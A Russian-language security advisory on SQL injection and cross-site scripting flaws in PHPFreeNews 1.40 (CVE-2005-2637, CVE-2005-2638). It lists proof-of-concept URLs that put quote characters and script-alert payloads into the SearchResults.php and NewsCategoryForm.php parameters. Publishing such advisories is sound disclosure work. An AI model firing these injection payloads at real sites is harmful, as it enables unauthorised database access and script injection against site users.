Несколько уязвимостей в PHPFreeNews

Дата публикации:
21.08.2005
Всего просмотров:
1193
Опасность:
Средняя
Наличие исправления:
Нет
Количество уязвимостей:
1
CVSSv2 рейтинг:
CVE ID:
CVE-2005-2637
CVE-2005-2638
Вектор эксплуатации:
Удаленная
Воздействие:
Межсайтовый скриптинг
Неавторизованное изменение данных
CWE ID:
Нет данных
Наличие эксплоита:
Нет данных
Уязвимые продукты:
PHPFreeNews 1.x
Уязвимые версии: PHPFreeNews 1.40

Описание: Удаленный пользователь может выполнить SQL команды и XSS нападение.

SQL инъекция:

http://[target]/phpfn/SearchResults.php?Match='&NewsMode=1&SearchNews=Search&Ca tID=0
http://[target]/phpfn/SearchResults.php?Match=1&NewsMode=1&SearchNews=Search&CatID='
http://[target]/phpfn/SearchResults.php?Match=%27&NewsMode=1&SearchNews=S earch&CatID=0
http://[target]/phpfn/SearchResults.php?Match=1&NewsMode=1&SearchNews=Search&CatID=%27
XSS:

http://[target]/phpfn/NewsCategoryForm.php?NewsMode="><script>alert('Found
By Matrix_Killer');</script>&CatID=0

http://[target]/phpfn/Se archResults.php?Match='><script>alert('Matrix_Killer
OwnZ The World :)');</script>&NewsMode=1&SearchNews=Search&CatID=0

http://[target]/phpfn/SearchResults.php?Match= 1&NewsMode=1&SearchNews=Search&CatID='><script>alert('Hell
Year');</script>

http://[target]/phpfn/SearchResults.php?Match=1&NewsMode="><script>alert('0_o
Please StoP !');</script>&SearchNews=Search&CatID=0

http://[target]/phpfn/SearchResults.php?Match="><script>alert('Matrix_Killer
-> The bug Hunter <-');</script>&NewsMode=1&SearchNews=Search&CatID=0

URL производителя: http://www.phpfreenews.co.uk/

Решение:Способов устранения обнаруженной уязвимости не существует в настоящее время.

Ссылки: PHPFreeNews v1.40 and prior Multiple

или введите имя

CAPTCHA